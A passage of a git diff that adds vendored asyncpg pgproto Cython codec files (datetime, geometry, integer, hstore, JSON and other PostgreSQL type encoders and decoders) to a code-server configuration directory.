Numeric +cdef numeric_encode_text(CodecContext settings, WriteBuffer buf, obj) +cdef numeric_decode_text(CodecContext settings, FRBuffer * buf) +cdef numeric_encode_binary(CodecContext settings, WriteBuffer buf, obj) +cdef numeric_decode_binary(CodecContext settings, FRBuffer * buf) +cdef numeric_decode_binary_ex(CodecContext settings, FRBuffer * buf, + bint trail_fract_zero) + + +# Void +cdef void_encode(CodecContext settings, WriteBuffer buf, obj) +cdef void_decode(CodecContext settings, FRBuffer * buf) + + +# tid +cdef tid_encode(CodecContext settings, WriteBuffer buf, obj) +cdef tid_decode(CodecContext settings, FRBuffer * buf) + + +# Network +cdef cidr_encode(CodecContext settings, WriteBuffer buf, obj) +cdef cidr_decode(CodecContext settings, FRBuffer * buf) +cdef inet_encode(CodecContext settings, WriteBuffer buf, obj) +cdef inet_decode(CodecContext settings, FRBuffer * buf) + + +# pg_snapshot +cdef pg_snapshot_encode(CodecContext settings, WriteBuffer buf, obj) +cdef pg_snapshot_decode(CodecContext settings, FRBuffer * buf) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/bits.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/bits.pyx new file mode 100755 index 0000000..14f7bb0 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/bits.pyx @@ -0,0 +1,47 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef bits_encode(CodecContext settings, WriteBuffer wbuf, obj): + cdef: + Py_buffer pybuf + bint pybuf_used = False + char *buf + ssize_t len + ssize_t bitlen + + if cpython.PyBytes_CheckExact(obj): + buf = cpython.PyBytes_AS_STRING(obj) + len = cpython.Py_SIZE(obj) + bitlen = len * 8 + elif isinstance(obj, pgproto_types.BitString): + cpython.PyBytes_AsStringAndSize(obj.bytes, &buf, &len) + bitlen = obj.__len__() + else: + cpython.PyObject_GetBuffer(obj, &pybuf, cpython.PyBUF_SIMPLE) + pybuf_used = True + buf = pybuf.buf + len = pybuf.len + bitlen = len * 8 + + try: + if bitlen > _MAXINT32: + raise ValueError('bit value too long') + wbuf.write_int32(4 + len) + wbuf.write_int32(bitlen) + wbuf.write_cstr(buf, len) + finally: + if pybuf_used: + cpython.PyBuffer_Release(&pybuf) + + +cdef bits_decode(CodecContext settings, FRBuffer *buf): + cdef: + int32_t bitlen = hton.unpack_int32(frb_read(buf, 4)) + ssize_t buf_len = buf.len + + bytes_ = cpython.PyBytes_FromStringAndSize(frb_read_all(buf), buf_len) + return pgproto_types.BitString.frombytes(bytes_, bitlen) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/bytea.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/bytea.pyx new file mode 100755 index 0000000..1581825 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/bytea.pyx @@ -0,0 +1,34 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef bytea_encode(CodecContext settings, WriteBuffer wbuf, obj): + cdef: + Py_buffer pybuf + bint pybuf_used = False + char *buf + ssize_t len + + if cpython.PyBytes_CheckExact(obj): + buf = cpython.PyBytes_AS_STRING(obj) + len = cpython.Py_SIZE(obj) + else: + cpython.PyObject_GetBuffer(obj, &pybuf, cpython.PyBUF_SIMPLE) + pybuf_used = True + buf = pybuf.buf + len = pybuf.len + + try: + wbuf.write_int32(len) + wbuf.write_cstr(buf, len) + finally: + if pybuf_used: + cpython.PyBuffer_Release(&pybuf) + + +cdef bytea_decode(CodecContext settings, FRBuffer *buf): + cdef ssize_t buf_len = buf.len + return cpython.PyBytes_FromStringAndSize(frb_read_all(buf), buf_len) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/context.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/context.pyx new file mode 100755 index 0000000..c4d4416 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/context.pyx @@ -0,0 +1,26 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef class CodecContext: + + cpdef get_text_codec(self): + raise NotImplementedError + + cdef is_encoding_utf8(self): + raise NotImplementedError + + cpdef get_json_decoder(self): + raise NotImplementedError + + cdef is_decoding_json(self): + return False + + cpdef get_json_encoder(self): + raise NotImplementedError + + cdef is_encoding_json(self): + return False diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/datetime.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/datetime.pyx new file mode 100755 index 0000000..4d43b85 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/datetime.pyx @@ -0,0 +1,423 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cimport cpython.datetime +import datetime + +cpython.datetime.import_datetime() + +utc = datetime.timezone.utc +date_from_ordinal = datetime.date.fromordinal +timedelta = datetime.timedelta + +pg_epoch_datetime = datetime.datetime(2000, 1, 1) +cdef int32_t pg_epoch_datetime_ts = \ + cpython.PyLong_AsLong(int(pg_epoch_datetime.timestamp())) + +pg_epoch_datetime_utc = datetime.datetime(2000, 1, 1, tzinfo=utc) +cdef int32_t pg_epoch_datetime_utc_ts = \ + cpython.PyLong_AsLong(int(pg_epoch_datetime_utc.timestamp())) + +pg_epoch_date = datetime.date(2000, 1, 1) +cdef int32_t pg_date_offset_ord = \ + cpython.PyLong_AsLong(pg_epoch_date.toordinal()) + +# Binary representations of infinity for datetimes. +cdef const int64_t pg_time64_infinity = 0x7fffffffffffffff +cdef const int64_t pg_time64_negative_infinity = 0x8000000000000000 +cdef const int32_t pg_date_infinity = 0x7fffffff +cdef const int32_t pg_date_negative_infinity = 0x80000000 + +infinity_datetime = datetime.datetime( + datetime.MAXYEAR, 12, 31, 23, 59, 59, 999999) + +cdef int32_t infinity_datetime_ord = cpython.PyLong_AsLong( + infinity_datetime.toordinal()) + +cdef int64_t infinity_datetime_ts = 252455615999999999 + +negative_infinity_datetime = datetime.datetime( + datetime.MINYEAR, 1, 1, 0, 0, 0, 0) + +cdef int32_t negative_infinity_datetime_ord = cpython.PyLong_AsLong( + negative_infinity_datetime.toordinal()) + +cdef int64_t negative_infinity_datetime_ts = -63082281600000000 + +infinity_date = datetime.date(datetime.MAXYEAR, 12, 31) + +cdef int32_t infinity_date_ord = cpython.PyLong_AsLong( + infinity_date.toordinal()) + +negative_infinity_date = datetime.date(datetime.MINYEAR, 1, 1) + +cdef int32_t negative_infinity_date_ord = cpython.PyLong_AsLong( + negative_infinity_date.toordinal()) + + +cdef inline _local_timezone(): + d = datetime.datetime.now(datetime.timezone.utc).astimezone() + return datetime.timezone(d.utcoffset()) + + +cdef inline _encode_time(WriteBuffer buf, int64_t seconds, + int32_t microseconds): + # XXX: add support for double timestamps + # int64 timestamps, + cdef int64_t ts = seconds * 1000000 + microseconds + + if ts == infinity_datetime_ts: + buf.write_int64(pg_time64_infinity) + elif ts == negative_infinity_datetime_ts: + buf.write_int64(pg_time64_negative_infinity) + else: + buf.write_int64(ts) + + +cdef inline int32_t _decode_time(FRBuffer *buf, int64_t *seconds, + int32_t *microseconds): + cdef int64_t ts = hton.unpack_int64(frb_read(buf, 8)) + + if ts == pg_time64_infinity: + return 1 + elif ts == pg_time64_negative_infinity: + return -1 + else: + seconds[0] = ts // 1000000 + microseconds[0] = (ts % 1000000) + return 0 + + +cdef date_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + int32_t ordinal = cpython.PyLong_AsLong(obj.toordinal()) + int32_t pg_ordinal + + if ordinal == infinity_date_ord: + pg_ordinal = pg_date_infinity + elif ordinal == negative_infinity_date_ord: + pg_ordinal = pg_date_negative_infinity + else: + pg_ordinal = ordinal - pg_date_offset_ord + + buf.write_int32(4) + buf.write_int32(pg_ordinal) + + +cdef date_encode_tuple(CodecContext settings, WriteBuffer buf, obj): + cdef: + int32_t pg_ordinal + + if len(obj) != 1: + raise ValueError( + 'date tuple encoder: expecting 1 element ' + 'in tuple, got {}'.format(len(obj))) + + pg_ordinal = obj[0] + buf.write_int32(4) + buf.write_int32(pg_ordinal) + + +cdef date_decode(CodecContext settings, FRBuffer *buf): + cdef int32_t pg_ordinal = hton.unpack_int32(frb_read(buf, 4)) + + if pg_ordinal == pg_date_infinity: + return infinity_date + elif pg_ordinal == pg_date_negative_infinity: + return negative_infinity_date + else: + return date_from_ordinal(pg_ordinal + pg_date_offset_ord) + + +cdef date_decode_tuple(CodecContext settings, FRBuffer *buf): + cdef int32_t pg_ordinal = hton.unpack_int32(frb_read(buf, 4)) + + return (pg_ordinal,) + + +cdef timestamp_encode(CodecContext settings, WriteBuffer buf, obj): + if not cpython.datetime.PyDateTime_Check(obj): + if cpython.datetime.PyDate_Check(obj): + obj = datetime.datetime(obj.year, obj.month, obj.day) + else: + raise TypeError( + 'expected a datetime.date or datetime.datetime instance, ' + 'got {!r}'.format(type(obj).__name__) + ) + + delta = obj - pg_epoch_datetime + cdef: + int64_t seconds = cpython.PyLong_AsLongLong(delta.days) * 86400 + \ + cpython.PyLong_AsLong(delta.seconds) + int32_t microseconds = cpython.PyLong_AsLong( + delta.microseconds) + + buf.write_int32(8) + _encode_time(buf, seconds, microseconds) + + +cdef timestamp_encode_tuple(CodecContext settings, WriteBuffer buf, obj): + cdef: + int64_t microseconds + + if len(obj) != 1: + raise ValueError( + 'timestamp tuple encoder: expecting 1 element ' + 'in tuple, got {}'.format(len(obj))) + + microseconds = obj[0] + + buf.write_int32(8) + buf.write_int64(microseconds) + + +cdef timestamp_decode(CodecContext settings, FRBuffer *buf): + cdef: + int64_t seconds = 0 + int32_t microseconds = 0 + int32_t inf = _decode_time(buf, &seconds, µseconds) + + if inf > 0: + # positive infinity + return infinity_datetime + elif inf < 0: + # negative infinity + return negative_infinity_datetime + else: + return pg_epoch_datetime.__add__( + timedelta(0, seconds, microseconds)) + + +cdef timestamp_decode_tuple(CodecContext settings, FRBuffer *buf): + cdef: + int64_t ts = hton.unpack_int64(frb_read(buf, 8)) + + return (ts,) + + +cdef timestamptz_encode(CodecContext settings, WriteBuffer buf, obj): + if not cpython.datetime.PyDateTime_Check(obj): + if cpython.datetime.PyDate_Check(obj): + obj = datetime.datetime(obj.year, obj.month, obj.day, + tzinfo=_local_timezone()) + else: + raise TypeError( + 'expected a datetime.date or datetime.datetime instance, ' + 'got {!r}'.format(type(obj).__name__) + ) + + buf.write_int32(8) + + if obj == infinity_datetime: + buf.write_int64(pg_time64_infinity) + return + elif obj == negative_infinity_datetime: + buf.write_int64(pg_time64_negative_infinity) + return + + utc_dt = obj.astimezone(utc) + + delta = utc_dt - pg_epoch_datetime_utc + cdef: + int64_t seconds = cpython.PyLong_AsLongLong(delta.days) * 86400 + \ + cpython.PyLong_AsLong(delta.seconds) + int32_t microseconds = cpython.PyLong_AsLong( + delta.microseconds) + + _encode_time(buf, seconds, microseconds) + + +cdef timestamptz_decode(CodecContext settings, FRBuffer *buf): + cdef: + int64_t seconds = 0 + int32_t microseconds = 0 + int32_t inf = _decode_time(buf, &seconds, µseconds) + + if inf > 0: + # positive infinity + return infinity_datetime + elif inf < 0: + # negative infinity + return negative_infinity_datetime + else: + return pg_epoch_datetime_utc.__add__( + timedelta(0, seconds, microseconds)) + + +cdef time_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + int64_t seconds = cpython.PyLong_AsLong(obj.hour) * 3600 + \ + cpython.PyLong_AsLong(obj.minute) * 60 + \ + cpython.PyLong_AsLong(obj.second) + int32_t microseconds = cpython.PyLong_AsLong(obj.microsecond) + + buf.write_int32(8) + _encode_time(buf, seconds, microseconds) + + +cdef time_encode_tuple(CodecContext settings, WriteBuffer buf, obj): + cdef: + int64_t microseconds + + if len(obj) != 1: + raise ValueError( + 'time tuple encoder: expecting 1 element ' + 'in tuple, got {}'.format(len(obj))) + + microseconds = obj[0] + + buf.write_int32(8) + buf.write_int64(microseconds) + + +cdef time_decode(CodecContext settings, FRBuffer *buf): + cdef: + int64_t seconds = 0 + int32_t microseconds = 0 + + _decode_time(buf, &seconds, µseconds) + + cdef: + int64_t minutes = (seconds / 60) + int64_t sec = seconds % 60 + int64_t hours = (minutes / 60) + int64_t min = minutes % 60 + + return datetime.time(hours, min, sec, microseconds) + + +cdef time_decode_tuple(CodecContext settings, FRBuffer *buf): + cdef: + int64_t ts = hton.unpack_int64(frb_read(buf, 8)) + + return (ts,) + + +cdef timetz_encode(CodecContext settings, WriteBuffer buf, obj): + offset = obj.tzinfo.utcoffset(None) + + cdef: + int32_t offset_sec = \ + cpython.PyLong_AsLong(offset.days) * 24 * 60 * 60 + \ + cpython.PyLong_AsLong(offset.seconds) + + int64_t seconds = cpython.PyLong_AsLong(obj.hour) * 3600 + \ + cpython.PyLong_AsLong(obj.minute) * 60 + \ + cpython.PyLong_AsLong(obj.second) + + int32_t microseconds = cpython.PyLong_AsLong(obj.microsecond) + + buf.write_int32(12) + _encode_time(buf, seconds, microseconds) + # In Python utcoffset() is the difference between the local time + # and the UTC, whereas in PostgreSQL it's the opposite, + # so we need to flip the sign. + buf.write_int32(-offset_sec) + + +cdef timetz_encode_tuple(CodecContext settings, WriteBuffer buf, obj): + cdef: + int64_t microseconds + int32_t offset_sec + + if len(obj) != 2: + raise ValueError( + 'time tuple encoder: expecting 2 elements2 ' + 'in tuple, got {}'.format(len(obj))) + + microseconds = obj[0] + offset_sec = obj[1] + + buf.write_int32(12) + buf.write_int64(microseconds) + buf.write_int32(offset_sec) + + +cdef timetz_decode(CodecContext settings, FRBuffer *buf): + time = time_decode(settings, buf) + cdef int32_t offset = (hton.unpack_int32(frb_read(buf, 4)) / 60) + # See the comment in the `timetz_encode` method. + return time.replace(tzinfo=datetime.timezone(timedelta(minutes=-offset))) + + +cdef timetz_decode_tuple(CodecContext settings, FRBuffer *buf): + cdef: + int64_t microseconds = hton.unpack_int64(frb_read(buf, 8)) + int32_t offset_sec = hton.unpack_int32(frb_read(buf, 4)) + + return (microseconds, offset_sec) + + +cdef interval_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + int32_t days = cpython.PyLong_AsLong(obj.days) + int64_t seconds = cpython.PyLong_AsLongLong(obj.seconds) + int32_t microseconds = cpython.PyLong_AsLong(obj.microseconds) + + buf.write_int32(16) + _encode_time(buf, seconds, microseconds) + buf.write_int32(days) + buf.write_int32(0) # Months + + +cdef interval_encode_tuple(CodecContext settings, WriteBuffer buf, + tuple obj): + cdef: + int32_t months + int32_t days + int64_t microseconds + + if len(obj) != 3: + raise ValueError( + 'interval tuple encoder: expecting 3 elements ' + 'in tuple, got {}'.format(len(obj))) + + months = obj[0] + days = obj[1] + microseconds = obj[2] + + buf.write_int32(16) + buf.write_int64(microseconds) + buf.write_int32(days) + buf.write_int32(months) + + +cdef interval_decode(CodecContext settings, FRBuffer *buf): + cdef: + int32_t days + int32_t months + int32_t years + int64_t seconds = 0 + int32_t microseconds = 0 + + _decode_time(buf, &seconds, µseconds) + + days = hton.unpack_int32(frb_read(buf, 4)) + months = hton.unpack_int32(frb_read(buf, 4)) + + if months < 0: + years = -(-months // 12) + months = -(-months % 12) + else: + years = (months // 12) + months = (months % 12) + + return datetime.timedelta(days=days + months * 30 + years * 365, + seconds=seconds, microseconds=microseconds) + + +cdef interval_decode_tuple(CodecContext settings, FRBuffer *buf): + cdef: + int32_t days + int32_t months + int64_t microseconds + + microseconds = hton.unpack_int64(frb_read(buf, 8)) + days = hton.unpack_int32(frb_read(buf, 4)) + months = hton.unpack_int32(frb_read(buf, 4)) + + return (months, days, microseconds) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/float.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/float.pyx new file mode 100755 index 0000000..94eda03 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/float.pyx @@ -0,0 +1,34 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from libc cimport math + + +cdef float4_encode(CodecContext settings, WriteBuffer buf, obj): + cdef double dval = cpython.PyFloat_AsDouble(obj) + cdef float fval = dval + if math.isinf(fval) and not math.isinf(dval): + raise ValueError('value out of float32 range') + + buf.write_int32(4) + buf.write_float(fval) + + +cdef float4_decode(CodecContext settings, FRBuffer *buf): + cdef float f = hton.unpack_float(frb_read(buf, 4)) + return cpython.PyFloat_FromDouble(f) + + +cdef float8_encode(CodecContext settings, WriteBuffer buf, obj): + cdef double dval = cpython.PyFloat_AsDouble(obj) + buf.write_int32(8) + buf.write_double(dval) + + +cdef float8_decode(CodecContext settings, FRBuffer *buf): + cdef double f = hton.unpack_double(frb_read(buf, 8)) + return cpython.PyFloat_FromDouble(f) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/geometry.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/geometry.pyx new file mode 100755 index 0000000..44aac64 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/geometry.pyx @@ -0,0 +1,164 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef inline _encode_points(WriteBuffer wbuf, object points): + cdef object point + + for point in points: + wbuf.write_double(point[0]) + wbuf.write_double(point[1]) + + +cdef inline _decode_points(FRBuffer *buf): + cdef: + int32_t npts = hton.unpack_int32(frb_read(buf, 4)) + pts = cpython.PyTuple_New(npts) + int32_t i + object point + double x + double y + + for i in range(npts): + x = hton.unpack_double(frb_read(buf, 8)) + y = hton.unpack_double(frb_read(buf, 8)) + point = pgproto_types.Point(x, y) + cpython.Py_INCREF(point) + cpython.PyTuple_SET_ITEM(pts, i, point) + + return pts + + +cdef box_encode(CodecContext settings, WriteBuffer wbuf, obj): + wbuf.write_int32(32) + _encode_points(wbuf, (obj[0], obj[1])) + + +cdef box_decode(CodecContext settings, FRBuffer *buf): + cdef: + double high_x = hton.unpack_double(frb_read(buf, 8)) + double high_y = hton.unpack_double(frb_read(buf, 8)) + double low_x = hton.unpack_double(frb_read(buf, 8)) + double low_y = hton.unpack_double(frb_read(buf, 8)) + + return pgproto_types.Box( + pgproto_types.Point(high_x, high_y), + pgproto_types.Point(low_x, low_y)) + + +cdef line_encode(CodecContext settings, WriteBuffer wbuf, obj): + wbuf.write_int32(24) + wbuf.write_double(obj[0]) + wbuf.write_double(obj[1]) + wbuf.write_double(obj[2]) + + +cdef line_decode(CodecContext settings, FRBuffer *buf): + cdef: + double A = hton.unpack_double(frb_read(buf, 8)) + double B = hton.unpack_double(frb_read(buf, 8)) + double C = hton.unpack_double(frb_read(buf, 8)) + + return pgproto_types.Line(A, B, C) + + +cdef lseg_encode(CodecContext settings, WriteBuffer wbuf, obj): + wbuf.write_int32(32) + _encode_points(wbuf, (obj[0], obj[1])) + + +cdef lseg_decode(CodecContext settings, FRBuffer *buf): + cdef: + double p1_x = hton.unpack_double(frb_read(buf, 8)) + double p1_y = hton.unpack_double(frb_read(buf, 8)) + double p2_x = hton.unpack_double(frb_read(buf, 8)) + double p2_y = hton.unpack_double(frb_read(buf, 8)) + + return pgproto_types.LineSegment((p1_x, p1_y), (p2_x, p2_y)) + + +cdef point_encode(CodecContext settings, WriteBuffer wbuf, obj): + wbuf.write_int32(16) + wbuf.write_double(obj[0]) + wbuf.write_double(obj[1]) + + +cdef point_decode(CodecContext settings, FRBuffer *buf): + cdef: + double x = hton.unpack_double(frb_read(buf, 8)) + double y = hton.unpack_double(frb_read(buf, 8)) + + return pgproto_types.Point(x, y) + + +cdef path_encode(CodecContext settings, WriteBuffer wbuf, obj): + cdef: + int8_t is_closed = 0 + ssize_t npts + ssize_t encoded_len + int32_t i + + if cpython.PyTuple_Check(obj): + is_closed = 1 + elif cpython.PyList_Check(obj): + is_closed = 0 + elif isinstance(obj, pgproto_types.Path): + is_closed = obj.is_closed + + npts = len(obj) + encoded_len = 1 + 4 + 16 * npts + if encoded_len > _MAXINT32: + raise ValueError('path value too long') + + wbuf.write_int32(encoded_len) + wbuf.write_byte(is_closed) + wbuf.write_int32(npts) + + _encode_points(wbuf, obj) + + +cdef path_decode(CodecContext settings, FRBuffer *buf): + cdef: + int8_t is_closed = (frb_read(buf, 1)[0]) + + return pgproto_types.Path(*_decode_points(buf), is_closed=is_closed == 1) + + +cdef poly_encode(CodecContext settings, WriteBuffer wbuf, obj): + cdef: + bint is_closed + ssize_t npts + ssize_t encoded_len + int32_t i + + npts = len(obj) + encoded_len = 4 + 16 * npts + if encoded_len > _MAXINT32: + raise ValueError('polygon value too long') + + wbuf.write_int32(encoded_len) + wbuf.write_int32(npts) + _encode_points(wbuf, obj) + + +cdef poly_decode(CodecContext settings, FRBuffer *buf): + return pgproto_types.Polygon(*_decode_points(buf)) + + +cdef circle_encode(CodecContext settings, WriteBuffer wbuf, obj): + wbuf.write_int32(24) + wbuf.write_double(obj[0][0]) + wbuf.write_double(obj[0][1]) + wbuf.write_double(obj[1]) + + +cdef circle_decode(CodecContext settings, FRBuffer *buf): + cdef: + double center_x = hton.unpack_double(frb_read(buf, 8)) + double center_y = hton.unpack_double(frb_read(buf, 8)) + double radius = hton.unpack_double(frb_read(buf, 8)) + + return pgproto_types.Circle((center_x, center_y), radius) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/hstore.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/hstore.pyx new file mode 100755 index 0000000..09051c7 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/hstore.pyx @@ -0,0 +1,73 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef hstore_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + char *str + ssize_t size + ssize_t count + object items + WriteBuffer item_buf = WriteBuffer.new() + + count = len(obj) + if count > _MAXINT32: + raise ValueError('hstore value is too large') + item_buf.write_int32(count) + + if hasattr(obj, 'items'): + items = obj.items() + else: + items = obj + + for k, v in items: + if k is None: + raise ValueError('null value not allowed in hstore key') + as_pg_string_and_size(settings, k, &str, &size) + item_buf.write_int32(size) + item_buf.write_cstr(str, size) + if v is None: + item_buf.write_int32(-1) + else: + as_pg_string_and_size(settings, v, &str, &size) + item_buf.write_int32(size) + item_buf.write_cstr(str, size) + + buf.write_int32(item_buf.len()) + buf.write_buffer(item_buf) + + +cdef hstore_decode(CodecContext settings, FRBuffer *buf): + cdef: + dict result + uint32_t elem_count + int32_t elem_len + uint32_t i + str k + str v + + result = {} + + elem_count = hton.unpack_int32(frb_read(buf, 4)) + if elem_count == 0: + return result + + for i in range(elem_count): + elem_len = hton.unpack_int32(frb_read(buf, 4)) + if elem_len < 0: + raise ValueError('null value not allowed in hstore key') + + k = decode_pg_string(settings, frb_read(buf, elem_len), elem_len) + + elem_len = hton.unpack_int32(frb_read(buf, 4)) + if elem_len < 0: + v = None + else: + v = decode_pg_string(settings, frb_read(buf, elem_len), elem_len) + + result[k] = v + + return result diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/int.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/int.pyx new file mode 100755 index 0000000..9997244 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/int.pyx @@ -0,0 +1,144 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef bool_encode(CodecContext settings, WriteBuffer buf, obj): + if not cpython.PyBool_Check(obj): + raise TypeError('a boolean is required (got type {})'.format( + type(obj).__name__)) + + buf.write_int32(1) + buf.write_byte(b'\x01' if obj is True else b'\x00') + + +cdef bool_decode(CodecContext settings, FRBuffer *buf): + return frb_read(buf, 1)[0] is b'\x01' + + +cdef int2_encode(CodecContext settings, WriteBuffer buf, obj): + cdef int overflow = 0 + cdef long val + + try: + if type(obj) is not int and hasattr(type(obj), '__int__'): + # Silence a Python warning about implicit __int__ + # conversion. + obj = int(obj) + val = cpython.PyLong_AsLong(obj) + except OverflowError: + overflow = 1 + + if overflow or val < INT16_MIN or val > INT16_MAX: + raise OverflowError('value out of int16 range') + + buf.write_int32(2) + buf.write_int16(val) + + +cdef int2_decode(CodecContext settings, FRBuffer *buf): + return cpython.PyLong_FromLong(hton.unpack_int16(frb_read(buf, 2))) + + +cdef int4_encode(CodecContext settings, WriteBuffer buf, obj): + cdef int overflow = 0 + cdef long val = 0 + + try: + if type(obj) is not int and hasattr(type(obj), '__int__'): + # Silence a Python warning about implicit __int__ + # conversion. + obj = int(obj) + val = cpython.PyLong_AsLong(obj) + except OverflowError: + overflow = 1 + + # "long" and "long long" have the same size for x86_64, need an extra check + if overflow or (sizeof(val) > 4 and (val < INT32_MIN or val > INT32_MAX)): + raise OverflowError('value out of int32 range') + + buf.write_int32(4) + buf.write_int32(val) + + +cdef int4_decode(CodecContext settings, FRBuffer *buf): + return cpython.PyLong_FromLong(hton.unpack_int32(frb_read(buf, 4))) + + +cdef uint4_encode(CodecContext settings, WriteBuffer buf, obj): + cdef int overflow = 0 + cdef unsigned long val = 0 + + try: + if type(obj) is not int and hasattr(type(obj), '__int__'): + # Silence a Python warning about implicit __int__ + # conversion. + obj = int(obj) + val = cpython.PyLong_AsUnsignedLong(obj) + except OverflowError: + overflow = 1 + + # "long" and "long long" have the same size for x86_64, need an extra check + if overflow or (sizeof(val) > 4 and val > UINT32_MAX): + raise OverflowError('value out of uint32 range') + + buf.write_int32(4) + buf.write_int32(val) + + +cdef uint4_decode(CodecContext settings, FRBuffer *buf): + return cpython.PyLong_FromUnsignedLong( + hton.unpack_int32(frb_read(buf, 4))) + + +cdef int8_encode(CodecContext settings, WriteBuffer buf, obj): + cdef int overflow = 0 + cdef long long val + + try: + if type(obj) is not int and hasattr(type(obj), '__int__'): + # Silence a Python warning about implicit __int__ + # conversion. + obj = int(obj) + val = cpython.PyLong_AsLongLong(obj) + except OverflowError: + overflow = 1 + + # Just in case for systems with "long long" bigger than 8 bytes + if overflow or (sizeof(val) > 8 and (val < INT64_MIN or val > INT64_MAX)): + raise OverflowError('value out of int64 range') + + buf.write_int32(8) + buf.write_int64(val) + + +cdef int8_decode(CodecContext settings, FRBuffer *buf): + return cpython.PyLong_FromLongLong(hton.unpack_int64(frb_read(buf, 8))) + + +cdef uint8_encode(CodecContext settings, WriteBuffer buf, obj): + cdef int overflow = 0 + cdef unsigned long long val = 0 + + try: + if type(obj) is not int and hasattr(type(obj), '__int__'): + # Silence a Python warning about implicit __int__ + # conversion. + obj = int(obj) + val = cpython.PyLong_AsUnsignedLongLong(obj) + except OverflowError: + overflow = 1 + + # Just in case for systems with "long long" bigger than 8 bytes + if overflow or (sizeof(val) > 8 and val > UINT64_MAX): + raise OverflowError('value out of uint64 range') + + buf.write_int32(8) + buf.write_int64(val) + + +cdef uint8_decode(CodecContext settings, FRBuffer *buf): + return cpython.PyLong_FromUnsignedLongLong( + hton.unpack_int64(frb_read(buf, 8))) \ No newline at end of file diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/json.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/json.pyx new file mode 100755 index 0000000..97e6916 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/json.pyx @@ -0,0 +1,57 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef jsonb_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + char *str + ssize_t size + + if settings.is_encoding_json(): + obj = settings.get_json_encoder().encode(obj) + + as_pg_string_and_size(settings, obj, &str, &size) + + if size > 0x7fffffff - 1: + raise ValueError('string too long') + + buf.write_int32(size + 1) + buf.write_byte(1) # JSONB format version + buf.write_cstr(str, size) + + +cdef jsonb_decode(CodecContext settings, FRBuffer *buf): + cdef uint8_t format = (frb_read(buf, 1)[0]) + + if format != 1: + raise ValueError('unexpected JSONB format: {}'.format(format)) + + rv = text_decode(settings, buf) + + if settings.is_decoding_json(): + rv = settings.get_json_decoder().decode(rv) + + return rv + + +cdef json_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + char *str + ssize_t size + + if settings.is_encoding_json(): + obj = settings.get_json_encoder().encode(obj) + + text_encode(settings, buf, obj) + + +cdef json_decode(CodecContext settings, FRBuffer *buf): + rv = text_decode(settings, buf) + + if settings.is_decoding_json(): + rv = settings.get_json_decoder().decode(rv) + + return rv diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/jsonpath.pyx 